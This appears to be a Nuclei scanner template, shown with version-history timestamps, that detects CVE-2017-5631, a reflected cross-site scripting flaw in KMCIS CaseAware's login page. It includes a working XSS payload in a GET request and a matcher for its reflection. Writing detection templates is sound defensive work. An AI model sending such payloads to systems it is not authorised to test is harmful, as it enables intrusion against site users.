nuclei-templates/http/cves/2017/CVE-2017-5631.yaml

50 lines
1.8 KiB
YAML
Raw Normal View History

2022-04-13 10:41:03 +00:00
id: CVE-2017-5631
info:
name: KMCIS CaseAware - Cross-Site Scripting
2022-04-13 10:41:03 +00:00
author: edoardottt
severity: medium
description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 13:22:34 +00:00
remediation: |
To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
2022-04-15 12:16:56 +00:00
reference:
- https://www.openbugbounty.org/incidents/228262/
- https://www.exploit-db.com/exploits/42042/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5631
2022-04-13 10:41:03 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-5631
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00286
epss-percentile: 0.65407
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: kmc_information_systems
product: caseaware
2024-01-14 09:21:50 +00:00
tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems
2022-04-13 10:41:03 +00:00
http:
2022-04-13 10:41:03 +00:00
- method: GET
path:
2022-04-15 12:16:56 +00:00
- "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-04-13 10:41:03 +00:00
matchers-condition: and
matchers:
- type: word
2022-04-15 12:16:56 +00:00
part: body
2022-04-13 10:41:03 +00:00
words:
2022-04-15 12:16:56 +00:00
- "'></script><script>alert(document.domain)</script>"
2022-04-13 10:41:03 +00:00
- type: word
2022-04-15 12:16:56 +00:00
part: header
2022-04-13 10:41:03 +00:00
words:
2022-04-15 12:16:56 +00:00
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100b7fb4783270359aa61923d9ec3041ebcabb0dda75d5d6e3cd6f3941102766df9022100bce7ff5f567fd4e3724a5b4f83dcaa01a07125e1fb06aa5c6fab61c31f2ff054:922c64590222798bb761d5b6d8e72950